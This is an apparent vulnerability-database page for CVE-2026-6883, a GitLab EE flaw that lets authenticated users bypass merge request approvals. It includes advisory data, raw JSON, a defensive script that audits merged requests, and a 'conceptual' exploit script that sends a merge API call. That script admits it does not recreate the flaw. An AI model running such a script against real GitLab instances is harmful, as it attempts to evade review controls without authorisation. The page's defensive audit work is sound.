Security Vulnerability Report
CVE-2026-6883 CVSS 2.6 LOW

CVE-2026-6883

Published: 2026-05-14 06:16:25
Last Modified: 2026-05-14 16:20:43

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 15.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to bypass merge request approval requirements due to improper cleanup of orphaned policy records.

CVSS Details

CVSS Score
2.6
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)


GitLab EE >= 15.7, < 18.9.7
GitLab EE >= 18.10, < 18.10.6
GitLab EE >= 18.11, < 18.11.3
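Two checks an operator would want after reading the description and the affected ranges above, written here as an added example (not GitLab's own code and not part of the advisory): a version-range test that encodes exactly the three vulnerable ranges listed, and an audit that recomputes, from the raw approval data, whether each merged merge request actually satisfied its approval rules, instead of trusting the server's own "approved" verdict, which is the value a bypass of this kind would corrupt. The record shape is modelled on the `approval_state` merge request API response (`rules`, `approvals_required`, `eligible_approvers`, `approved_by`); those field names, the `state`/`iid` fields on the merge request, and all sample data are assumptions constructed for the example and should be checked against the API of the GitLab version you run.

```python
"""Post-advisory audit helpers for CVE-2026-6883 (constructed example, not GitLab code)."""
from typing import Dict, List, Tuple

# Vulnerable ranges from the advisory, as [lower_inclusive, upper_exclusive).
AFFECTED_RANGES: List[Tuple[str, str]] = [
    ("15.7", "18.9.7"),
    ("18.10", "18.10.6"),
    ("18.11", "18.11.3"),
]


def parse_version(version: str) -> Tuple[int, ...]:
    """'18.9.7-ee' -> (18, 9, 7); pads to three parts so '18.10' sorts below '18.10.6'."""
    numeric = version.strip().split("-")[0]          # drop edition suffixes like '-ee'
    parts = tuple(int(p) for p in numeric.split(".")[:3])
    return parts + (0,) * (3 - len(parts))


def is_affected(version: str) -> bool:
    """True if the given GitLab EE version falls inside any advisory range."""
    v = parse_version(version)
    return any(parse_version(lo) <= v < parse_version(hi) for lo, hi in AFFECTED_RANGES)


def unsatisfied_rules(approval_state: Dict) -> List[str]:
    """Names of rules whose recorded approvals do not meet the rule.

    Recomputed from approved_by / eligible_approvers; the rule's own
    'approved' flag is deliberately ignored because that server-side verdict
    is exactly what an approval bypass would have gotten wrong.
    Field names follow the approval_state API shape (assumption).
    """
    failures = []
    for rule in approval_state.get("rules", []):
        required = rule.get("approvals_required", 0)
        if required == 0:
            continue                                  # nothing to enforce
        eligible = {u["username"] for u in rule.get("eligible_approvers", [])}
        approvers = {u["username"] for u in rule.get("approved_by", [])}
        valid = approvers if not eligible else approvers & eligible  # empty list = any approver
        if len(valid) < required:
            failures.append(rule["name"])
    return failures


def find_unsatisfied_merges(merge_requests: List[Dict]) -> Dict[int, List[str]]:
    """Map MR iid -> unsatisfied rule names, considering merged MRs only."""
    findings: Dict[int, List[str]] = {}
    for mr in merge_requests:
        if mr.get("state") != "merged":
            continue
        failed = unsatisfied_rules(mr["approval_state"])
        if failed:
            findings[mr["iid"]] = failed
    return findings


# Constructed sample data (not real merge requests), shaped like the API response.
SEC = [{"username": "sec-lead"}, {"username": "sec-eng"}]
SAMPLE_MRS = [
    {"iid": 41, "state": "merged", "approval_state": {"rules": [
        {"name": "Security review", "approvals_required": 2, "eligible_approvers": SEC,
         "approved_by": SEC, "approved": True}]}},
    {"iid": 42, "state": "merged", "approval_state": {"rules": [      # server says approved,
        {"name": "Security review", "approvals_required": 2, "eligible_approvers": SEC,
         "approved_by": [{"username": "sec-lead"}], "approved": True}]}},  # but only 1 of 2
    {"iid": 43, "state": "merged", "approval_state": {"rules": [
        {"name": "Any approver", "approvals_required": 1, "eligible_approvers": [],
         "approved_by": [{"username": "dev-b"}], "approved": True}]}},
    {"iid": 44, "state": "opened", "approval_state": {"rules": [      # not merged: skipped
        {"name": "Security review", "approvals_required": 1, "eligible_approvers": SEC,
         "approved_by": [], "approved": False}]}},
    {"iid": 45, "state": "merged", "approval_state": {"rules": [      # approver not eligible
        {"name": "Code owners", "approvals_required": 1,
         "eligible_approvers": [{"username": "owner-a"}],
         "approved_by": [{"username": "dev-b"}], "approved": True}]}},
]

if __name__ == "__main__":
    for ver in ("18.9.6", "18.9.7", "18.10.5-ee", "18.11.3"):
        print(f"{ver}: {'affected' if is_affected(ver) else 'not affected'}")
    print("merged MRs with unmet rules:", find_unsatisfied_merges(SAMPLE_MRS))
```

The audit is only as good as the data it is fed: pull `approval_state` for each MR merged while the instance was in an affected range, and treat any hit as a lead to review by hand rather than proof of exploitation, since rule changes after the merge can also make a historical approval set look short.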

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Conceptual Proof of Concept for CVE-2026-6883
# This script demonstrates the potential to bypass merge request approvals
# due to improper cleanup of orphaned policy records. It only issues the
# final merge call; it does not reproduce the orphaned-record condition.

TARGET = "https://gitlab.example.com"
TOKEN = "your_access_token"
PROJECT_ID = "1"
MR_IID = "2"

headers = {"PRIVATE-TOKEN": TOKEN}


def exploit():
    # Step 1: Attacker authenticates and identifies a target Merge Request
    print(f"[*] Targeting MR {MR_IID} on Project {PROJECT_ID}...")

    # Step 2: Trigger the condition where orphaned policy records exist
    # (In a real scenario, this involves specific API interactions to
    # create/delete policies; that step is not implemented here.)
    print("[*] Simulating environment with orphaned policy records...")

    # Step 3: Attempt to accept the Merge Request without full approvals
    url = f"{TARGET}/api/v4/projects/{PROJECT_ID}/merge_requests/{MR_IID}/merge"
    payload = {
        "merge_when_pipeline_succeeds": True,
        "should_remove_source_branch": False,
    }
    response = requests.put(url, headers=headers, json=payload, timeout=30)

    if response.status_code == 200:
        print("[+] Exploit successful! Merge Request accepted bypassing approval rules.")
    else:
        # A patched instance should answer non-200 here: 405 when the MR is
        # not mergeable (approvals still outstanding, conflicts), 401 when the
        # token lacks permission to accept it, 409 on a SHA mismatch.
        print(f"[-] Exploit failed. Status: {response.status_code}")
        print(response.text)


if __name__ == "__main__":
    exploit()
```

References

https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
https://gitlab.com/gitlab-org/gitlab/-/work_items/596350
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-6883",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T06:16:25.117",
    "lastModified": "2026-05-14T16:20:43.240",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 15.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to bypass merge request approval requirements due to improper cleanup of orphaned policy records."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 2.6,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/",
        "source": "[email protected]"
      },
      {
        "url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/596350",
        "source": "[email protected]"
      }
    ]
  }
}
```